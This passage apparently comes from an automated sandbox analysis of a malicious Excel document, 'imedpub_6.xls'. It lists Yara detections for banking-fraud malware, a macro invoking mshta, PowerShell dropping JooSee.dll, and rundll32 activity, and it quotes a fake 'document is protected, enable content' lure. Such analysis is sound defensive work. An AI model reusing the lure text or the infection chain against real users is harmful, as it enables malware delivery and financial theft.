                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara match File source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            Source: imedpub_6.xls, Macro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4, Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\JooSee.dll
                            Source: imedpub_6.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003351BB9_2_003351BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003322519_2_00332251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A2E89_2_0034A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B2C79_2_0033B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E2CC9_2_0033E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003353619_2_00335361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003343469_2_00334346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C3A09_2_0034C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003513AD9_2_003513AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E3959_2_0034E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D3899_2_0034D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F4359_2_0034F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034044F9_2_0034044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003364E29_2_003364E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003485199_2_00348519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003425509_2_00342550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033A55F9_2_0033A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003355489_2_00335548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003495FA9_2_003495FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E5CF9_2_0033E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C6319_2_0034C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003486069_2_00348606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A6669_2_0034A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033D6D89_2_0033D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003466CA9_2_003466CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003377359_2_00337735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034473C9_2_0034473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003397149_2_00339714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034176B9_2_0034176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B74D9_2_0033B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003348169_2_00334816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003418899_2_00341889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003389699_2_00338969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034894B9_2_0034894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003509B59_2_003509B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003359F29_2_003359F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AA309_2_0034AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00331A569_2_00331A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EA999_2_0033EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00338B3D9_2_00338B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB239_2_0034BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340B199_2_00340B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033BB7E9_2_0033BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CB5B9_2_0034CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347BA69_2_00347BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339B839_2_00339B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344B879_2_00344B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348BE39_2_00348BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DBEA9_2_0034DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00332BD99_2_00332BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349BCF9_2_00349BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337C379_2_00337C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AC3A9_2_0034AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333C3C9_2_00333C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350C149_2_00350C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334C5D9_2_00334C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346C499_2_00346C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DCF79_2_0034DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345CC49_2_00345CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00336D249_2_00336D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346DF89_2_00346DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347DD59_2_00347DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339DCF9_2_00339DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333E3F9_2_00333E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350E3A9_2_00350E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BE279_2_0034BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00335E609_2_00335E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AE6D9_2_0034AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340E539_2_00340E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EE819_2_0033EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033AEFB9_2_0033AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334EE39_2_00334EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349EEC9_2_00349EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DEDC9_2_0034DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350F339_2_00350F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033CF479_2_0033CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033DFF39_2_0033DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337FF29_2_00337FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C901110_2_001C9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3C3C10_2_001C3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D044F10_2_001D044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D20BA10_2_001D20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CD6D810_2_001CD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF8FD10_2_001CF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D411610_2_001D4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAB8710_2_001CAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E13AD10_2_001E13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D95FA10_2_001D95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7FF210_2_001C7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C59F210_2_001C59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C481610_2_001C4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0C1410_2_001E0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D860610_2_001D8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D000110_2_001D0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3E3F10_2_001C3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0E3A10_2_001E0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAC3A10_2_001DAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF43510_2_001DF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7C3710_2_001C7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC63110_2_001DC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAA3010_2_001DAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBE2710_2_001DBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4C5D10_2_001C4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E005610_2_001E0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C1A5610_2_001C1A56
